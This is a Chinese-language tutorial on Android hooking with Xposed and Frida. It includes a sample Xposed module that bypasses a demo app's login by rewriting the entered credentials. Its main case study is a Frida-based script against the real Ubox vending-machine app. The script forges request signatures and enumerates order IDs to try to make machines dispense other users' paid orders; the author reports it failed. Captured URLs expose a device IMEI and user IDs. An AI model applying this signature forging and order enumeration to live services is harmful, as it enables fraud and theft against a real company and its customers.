淺談android hook技術

前言

xposed框架

xposed，主頁：Xposed Installer

是個開源的框架，在github上有源碼的，直接下載apk後安裝激活就可以使用，很多地方有這方面的教程，針對不同的手機架構，有大牛做了針對性的修改。可以在論壇中進行搜索

通過替換/system/bin/app_process程序控制zygote進程，使得app_process在啟動過程中會載入XposedBridge.jar這個jar包，從而完成對Zygote進程及其創建的Dalvik虛擬機的劫持。

Xposed在開機的時候完成對所有的Hook Function的劫持，在原Function執行的前後加上自定義代碼

很多人將這個框架用在對android的私有化定製上面，其實在android安全測試方面這個框架提供了很大的便利，xposed主要是對方法的hook，在以往的重打包技術中，需要對smali代碼的進行修改，修改起來比較麻煩。

利用xposed框架可以很容易的獲取到android應用中的信息，比如加密私鑰、salt值等等，不需要飯編譯獲取密鑰轉換演算法、不需要了解密鑰保存機制，直接hook函數，獲取輸入輸出就可以。

原理

在Android系統中，應用程序進程都是由Zygote進程孵化出來的，而Zygote進程是由Init進程啟動的。Zygote進程在啟動時會創建一個Dalvik虛擬機實例，每當它孵化一個新的應用程序進程時，都會將這個Dalvik虛擬機實例複製到新的應用程序進程裡面去，從而使得每一個應用程序進程都有一個獨立的Dalvik虛擬機實例。這也是Xposed選擇替換app_process的原因。

Zygote進程在啟動的過程中，除了會創建一個Dalvik虛擬機實例之外，還會將Java運行時庫載入到進程中來，以及註冊一些Android核心類的JNI方法來前面創建的Dalvik虛擬機實例中去。注意，一個應用程序進程被Zygote進程孵化出來的時候，不僅會獲得Zygote進程中的Dalvik虛擬機實例拷貝，還會與Zygote一起共享Java運行時庫。這也就是可以將XposedBridge這個jar包載入到每一個Android應用程序中的原因。XposedBridge有一個私有的Native（JNI）方法hookMethodNative，這個方法也在app_process中使用。這個函數提供一個方法對象利用Java的Reflection機制來對內置方法覆寫。有能力的可以針對xposed的源碼進行分析，不得不說，作者對於android的機制和java的了解已經相當深入了。

簡單實例

很簡單的一個android登入代碼：

public class MainActivity extends AppCompatActivity {nn private TextView accountView;n private TextView passwdView;n private Button loginBut;n private Button quitBut;nn @Overriden protected void onCreate(Bundle savedInstanceState) {n super.onCreate(savedInstanceState);n setContentView(R.layout.activity_main);nn accountView = (TextView) findViewById(R.id.account);n passwdView = (TextView) findViewById(R.id.pwd);nn loginBut = (Button) findViewById(R.id.login);n quitBut = (Button) findViewById(R.id.quit);nn loginBut.setOnClickListener(new View.OnClickListener() {n @Overriden public void onClick(View v) {n String username = accountView.getText() + "";n String password = passwdView.getText() + "";n if(isCorrectInfo(username,password)){n Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();n }n else{n Toast.makeText(MainActivity.this,"登入失敗",Toast.LENGTH_LONG).show();n }n }n });n }nn public boolean isCorrectInfo(String username, String password) {n if(username.equals("admin") && password.equals("passwd")){n return true;n }n else{n return false;n }n }nn}n

很簡單的就是判斷下用戶輸入的用戶名和密碼是正確，這裡做個簡單的演示，將用戶輸入的用戶名和密碼信息hook出來不管正確與否

簡單說下xposed模塊的開發，首先需要的是導入api，具體的可以參考：rovo89/XposedBridge

在manifest中定義

<application android:label="xposed">n <meta-datan android:name="xposedmodule"n android:value="true" />n <meta-datan android:name="xposeddescription"n android:value="hook test" />n <meta-datan android:name="xposedminversion"n android:value="82" />n </application>n

聲明這個是xposed模塊，名稱為hook test 並且使用api版本號是82

下面創建運行時候的hook代碼：

package com.example.xposed;nnimport java.util.List;nnimport de.robv.android.xposed.IXposedHookLoadPackage;nimport de.robv.android.xposed.XC_MethodHook;nimport de.robv.android.xposed.XposedBridge;nimport de.robv.android.xposed.callbacks.XC_LoadPackage;nnimport static de.robv.android.xposed.XposedHelpers.findAndHookMethod;nnpublic class Main implements IXposedHookLoadPackage {n // 包載入的時候回調n public void handleLoadPackage(final XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {n //過濾掉不是com.example.logintest的應用n if (!lpparam.packageName.equals("com.example.logintest"))n return;n XposedBridge.log("載入應用:" + lpparam.packageName);nn // Hook MainActivity 中的判斷方法n findAndHookMethod("com.example.logintest.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,String.class new XC_MethodHook() {n @Overriden protected void beforeHookedMethod(MethodHookParam param) throws Throwable {n super.beforeHookedMethod(param);n // XposedBridge.log("開始劫持~~~~");n // XposedBridge.log("參數1:" + param.args[0]);n XposedBridge.log("參數2:" + param.args[1]);n XposedBridge.log("修改登入數據~~~~");// 修改為正確的用戶名密碼n param.args[0]="admin";n param.args[1]="passwd";n }nn @Overriden protected void afterHookedMethod(MethodHookParam param) throws Throwable {n// super.afterHookedMethod(param);n XposedBridge.log("劫持結束~~~~");n// XposedBridge.log("參數1:" + param.args[0]);n// XposedBridge.log("參數2:" + param.args[1]);n }n });n }nn}n

看代碼中的注釋，主要是三個方法的調用，handleLoadPackage，主要是獲取到android包的相關信息，這裡由於只是對logintest進行hook,做下簡單的判斷。

findAndHookMethod 是主要的hook入口，裡面幾個參數分別為包名，classloader，hook的函數名，參數類型（這個比較容易出錯，比如list類型寫為List.class）,回調函數

回調函數中比較重要的：beforeHookedMethod和afterHookedMethod，一個是在函數運行前劫持掉，一個是hook後放行，實例中對用戶輸入的欄位進行劫持列印，後面將參數之改為正確登入用戶名和密碼，這樣在app中輸入任何字元都能登入成功

frida Hook框架

Frida是一款基於python + javascript 的hook框架，通殺androidioslinuxwinosx等各平台，由於是基於腳本的交互，因此相比xposed和substrace cydia更加便捷，本文重點介紹Frida在android下面的使用。

Frida的官網為：Frida ? A world-class dynamic instrumentation framework

安裝

安裝Frida非常簡單，在pc端直接執行

pip install fridan

即可

在Android設備需要導入frida的服務端，需要root你的手機

$ curl -O http://build.frida.re/frida/android/arm/bin/frida-servern$ chmod+x frida-servern$ adb push frida-server /data/local/tmp/n

運行

設備上運行frida-server:

$ adb shellnroot@android:/ chmod 700 frida-servern$ adb shellnroot@android:/ /data/local/tmp/frida-server -t 0 (注意在root下運行)n

電腦上運行adb forward tcp轉發:

adb forward tcp:27042 tcp:27042nadb forward tcp:27043 tcp:27043n

27042埠用於與frida-server通信,之後的每個埠對應每個注入的進程.

運行如下命令驗證是否成功安裝:

$ frida-ps-Rn

正常情況應該輸出進程列表如下:

PID NAMEn 1590 com.facebook.katanan13194 com.facebook.katana:providersn12326 com.facebook.orcan13282 com.twitter.androidn…n

Hook模塊的編寫

hook的主要模塊是js編寫的，利用javascript的api與server進行通信

下面結合一個真實例子進行簡單的介紹，首先是測試代碼：

# -*- coding:utf-8 -*-nimport frida, sys #引入frida類nimport loggingnnlogging.basicConfig(filename=test.log, level=logging.INFO)nnreload(sys)nsys.setdefaultencoding(utf-8) #對輸出進行utf8的編碼nprint sys.getdefaultencoding()nndef print_result(message): #對輸出的信息進行列印n print messagen logging.info(message)nndef on_message(message, data): # 反調函數，用來接受message的信息，message後面會說到n try:n print_result(message=message)n except:n passnndid = "255601452" # 訂單idntime = "1472706588" # 時間戳nnjscode = """ # 核心代碼，這段主要是調用app中的相應處理函數，後面會分析這段代碼的來源nnDalvik.perform(function () { # 說明是Dalvik平台n var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();n var context = currentApplication.getApplicationContext();n var signclass = Dalvik.use("com.ub.main.d.e");# 調用com.ub.main.d.e類n var signInstance=signclass.$new(context); # 反射創建一個新的對象n var sign=signInstance.a("255601452"); #調用對象的a函數n send(sign); #將調用函數的結果發送出來n});n"""n#print jscodennprocess = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # 獲取連接的設備並枚舉取最後一個設備連接，並附到com.ub.main的進程上面nnprint processnnscript = process.create_script(jscode) # 調用相應的js函數，獲取函數調用後的結果值nscript.on(message, on_message) # 利用回調，將message傳遞給on_message函數nprint "done"nscript.load()n

反編譯獲取app中的核心函數

對於上面的js代碼，其實就是調用app中的某個函數，比如sign值生成函數，加密解密函數，不需要自己單獨的去分析演算法流程，分析key值在哪，直接調用app的相應函數，讓app幫我們完成這些工作

這裡我們分析的app是友寶，這是一款飲料售貨機，當時抓包看到提貨的時候是只有個訂單id的，猜想是不是遍歷訂單的id，支付成功但是沒有取貨的訂單會不會響應請求，自己掉貨出來

下面對友寶的訂單進行分析過程

抓取訂單鏈接：

http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4nnpostdata：sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452&timestamp=1472706588n

分析：

sign是校驗值，主要是防止訂單偽造的，orderid是產生的支付訂單id，這個主要是防止偽造用

• 反編譯友寶app

找到morder/shipping所在的包為：com/ub/main/d/e.class

其中localStringBuffer存儲的就是url中的參數信息，該請求查找到的代碼在a()

生成簽名的函數在com/ub/main/d/e.class中的b函數

最後加上sign值，發送請求

可以反編譯出他的sign計算方法，也可以直接調用b函數來產生sign值，後來發現app會自動取時間戳，我們就不需要給他array型的參數

直接調用a函數，把orderId給他，讓他直接return一個值出來就好了，就有了上面的js代碼

• 自動化的批量處理看代碼

# __author__ = adrainn# -*- coding:utf-8 -*-nimport frida, sysnimport loggingnimport requestsnnlogging.basicConfig(filename=test.log, level=logging.INFO)nnreload(sys)nsys.setdefaultencoding(utf-8)nn# print sys.getdefaultencoding()nnclass ubox:n def __init__(self):n passnn def request(self, payload):n # print "requests"n dict = {}n url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"n for i in payload.split("&"):n key = i.split("=")[0]n value = i.split("=")[1]n dict[key] = valuenn data=dictnn r=requests.post(url=url,data=data)nn print r.textnn def print_result(self, message):n # print messagen payload = message["payload"]n print payloadn self.request(payload)nn def on_message(self, message, data):n self.print_result(message=message)nn def fuzzing(self, did):n jscode = """n Dalvik.perform(function () {n var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();n var context = currentApplication.getApplicationContext();n var signclass = Dalvik.use("com.ub.main.d.e");n var signInstance=signclass.$new(context);n var sign=signInstance.a("%s");n send(sign);n });n """ % didn # print jscoden process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main")n # print processn script = process.create_script(jscode)n script.on(message, self.on_message)n # print "done"n script.load()n # sys.stdin.read()nnub = ubox()nub.fuzzing("255912964")n

構造了一個類，後面直接fuzz uid就可以了，提取裡面的sign值拼接到post數據中去

可以產生的post請求和抓到的數據包的請求是完全一樣的，但是並沒有測試成功，分析原因有可能是訂單id和用戶的id有所綁定。

不過學習到了怎樣通過frida對app進行分析。

複雜參數的hook

如果遇到函數的參數類型是數組、map、ArrayList類型的，首先目標MyClass類的fun1函數，聲明如下：

public static boolean fun1(String[][] strAry, Map mp1, Map<String,String> mp2, Map<Integer, String> mp3,n ArrayList<String> al1, ArrayList<Integer> al2, ArgClass ac)n

解決方法：

用Xposed自身提供的XposedHelpers的findClass方法載入每一個類，然後再將得到的類傳遞給hook函數作參數！

參考鏈接：

安卓Hook函數的複雜參數如何給定？|漏洞研究 - 安全技術社區

使用滲透測試框架Xposed Framework hook調試Android APP

【求助】Xposed中，要hook的方法的參數是自定義類數組，怎麼寫，謝謝？-『Android安全』-看雪安全論壇

推薦閱讀：